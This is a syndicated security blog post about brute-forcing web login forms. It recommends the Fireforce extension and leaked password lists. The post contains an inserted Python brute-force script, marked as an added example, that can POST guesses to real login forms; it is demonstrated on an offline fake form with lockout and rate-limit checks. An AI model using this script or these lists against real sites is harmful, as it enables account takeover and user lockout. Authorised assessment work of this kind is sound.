Easy, Breezy, Beautiful, Password Attacking…


Brute-forcing web forms is typically part of a web application assessment. We like to use Hydra, Medusa, or Wfuzz for this, but we recently came across a tool that makes it much easier. It's called Fireforce. It's a Firefox extension that lets you do the whole thing by pointing and clicking.

We ran it in our labs with about a 74% success rate, meaning it correctly mapped the login parameters to the web form and returned the correct password to us (i.e. it didn't die and take our browser down with it). So it's not perfect, but we're willing to forgive that for its ease of use. It is very simple: give it a username, right-click in the form's password field, give it the text the login form returns on an unsuccessful login, and point it at a brute-force list. Be sure to read the documentation, as you will need to use a separate Firefox profile if you want to browse while the tool runs (it's a memory/CPU hog). *Note* We have not performed any code analysis on the extension; use it at your own risk, in your lab.

Also, yesterday we tweeted about Ron Bowes of Skullsecurity.com's password analysis and collection of password lists, which are well worth grabbing. Ron has performed data analysis on some of the password lists leaked in recent years, such as RockYou, MySpace, and phpBB. The site also hosts default password lists for many common industry tools, and even the password list Conficker used to propagate. Grab those lists if you don't already have them; who knows how long they'll stick around. Ron has actually been on a hot streak lately, having released an awesome tool called dnscat. He also wrote some VMware guest-stealing NSE scripts, which we will post about later.

Remember that brute-forcing passwords is great as long as you don't DoS the application/server. Also remember that just because it's a web form doesn't mean it isn't tied to another backend system (LDAP, etc.), so be aware that you can lock out users.
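To make the two points above concrete (the inputs a form brute-forcer needs: username, password field, failure string, wordlist; and the lockout/DoS caveat), here is an added example, not code from the original post or from Fireforce. The target form, its field names, its messages and the wordlist are all constructed for the demo; the `make_http_submitter` helper is a hypothetical adapter for a real form and is not exercised offline.

```python
"""Minimal web-form brute-forcer with the same inputs Fireforce asks for
(username, password field, failure string, wordlist) plus the rate and
attempt limits you want so you don't DoS the server or lock out users.
Added example, not the original post's or Fireforce's code."""
import time
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

# A submitter takes (username, password) and returns the response body.
Submitter = Callable[[str, str], str]


def make_http_submitter(url: str, user_field: str, pass_field: str,
                        extra: Optional[dict] = None,
                        timeout: float = 10.0) -> Submitter:
    """Build a submitter that POSTs to a real login form. Field names are
    hypothetical; read them off the target's HTML. Not used by the demo."""
    def submit(username: str, password: str) -> str:
        data = {user_field: username, pass_field: password}
        data.update(extra or {})
        body = urllib.parse.urlencode(data).encode()
        req = urllib.request.Request(url, data=body, method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    return submit


def brute_force(submit: Submitter, username: str, wordlist: Iterable[str],
                failure_text: str, lockout_text: Optional[str] = None,
                max_attempts: Optional[int] = None, delay: float = 0.0) -> dict:
    """Try each password until the failure string disappears from the reply.

    Returns {'password': str|None, 'attempts': int,
             'stopped_by': 'found'|'exhausted'|'lockout'|'max_attempts'}.
    """
    attempts = 0
    for password in wordlist:
        if max_attempts is not None and attempts >= max_attempts:
            return {"password": None, "attempts": attempts,
                    "stopped_by": "max_attempts"}
        body = submit(username, password)
        attempts += 1
        # A lockout page also lacks the failure string, so check it first or
        # the backend (LDAP, AD, ...) locking the account looks like success.
        if lockout_text and lockout_text in body:
            return {"password": None, "attempts": attempts,
                    "stopped_by": "lockout"}
        if failure_text not in body:
            return {"password": password, "attempts": attempts,
                    "stopped_by": "found"}
        if delay:
            time.sleep(delay)  # pace requests so the target is not DoS'd
    return {"password": None, "attempts": attempts, "stopped_by": "exhausted"}


class FakeLoginForm:
    """Constructed offline stand-in for a login form backed by a directory
    that locks an account after N bad tries (like an LDAP/AD policy)."""
    def __init__(self, creds: dict, lockout_threshold: int = 0):
        self.creds = creds
        self.lockout_threshold = lockout_threshold
        self.failures: dict = {}

    def submit(self, username: str, password: str) -> str:
        if self.lockout_threshold and \
                self.failures.get(username, 0) >= self.lockout_threshold:
            return "<p>Account locked. Contact your administrator.</p>"
        if self.creds.get(username) == password:
            return "<h1>Welcome, %s</h1>" % username
        self.failures[username] = self.failures.get(username, 0) + 1
        return "<p>Invalid username or password.</p>"


WORDLIST = ["123456", "password", "letmein", "Summer2010", "qwerty"]  # constructed


def demo() -> dict:
    """No lockout policy: the fourth guess is right."""
    target = FakeLoginForm({"alice": "Summer2010"})
    return brute_force(target.submit, "alice", WORDLIST,
                       failure_text="Invalid username or password",
                       lockout_text="Account locked")


def demo_lockout() -> dict:
    """Lock after 3 failures: the run aborts on the lockout page instead of
    burning the rest of the list, and the correct password is never seen."""
    target = FakeLoginForm({"alice": "Summer2010"}, lockout_threshold=3)
    return brute_force(target.submit, "alice", WORDLIST,
                       failure_text="Invalid username or password",
                       lockout_text="Account locked")


if __name__ == "__main__":
    print(demo())
    print(demo_lockout())
```

The second run shows why the lockout string matters: once the directory locks the account, the "Invalid username or password" text disappears from the response, and a tool that only watches for the failure string would report the next guess as the password. Checking for the lockout message (and capping `max_attempts` below the backend's threshold, with a `delay` between tries) is what keeps a web-form brute force from turning into a denial of service against your client's users.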

Also, you might want to check out our article from a while back on password attacks here.

Get Fireforce here

Get password lists here

Get dnscat here

Find Ron on Twitter: @iagox86


The post Easy, Breezy, Beautiful, Password Attacking… appeared first on Security Aegis.

*** This is a syndicated blog from the Security Bloggers Network of Security Aegis Written by Security Aegis. Read the original post at: https://www.securityaegis.com/easy-breezy-beautiful-password-attacking/
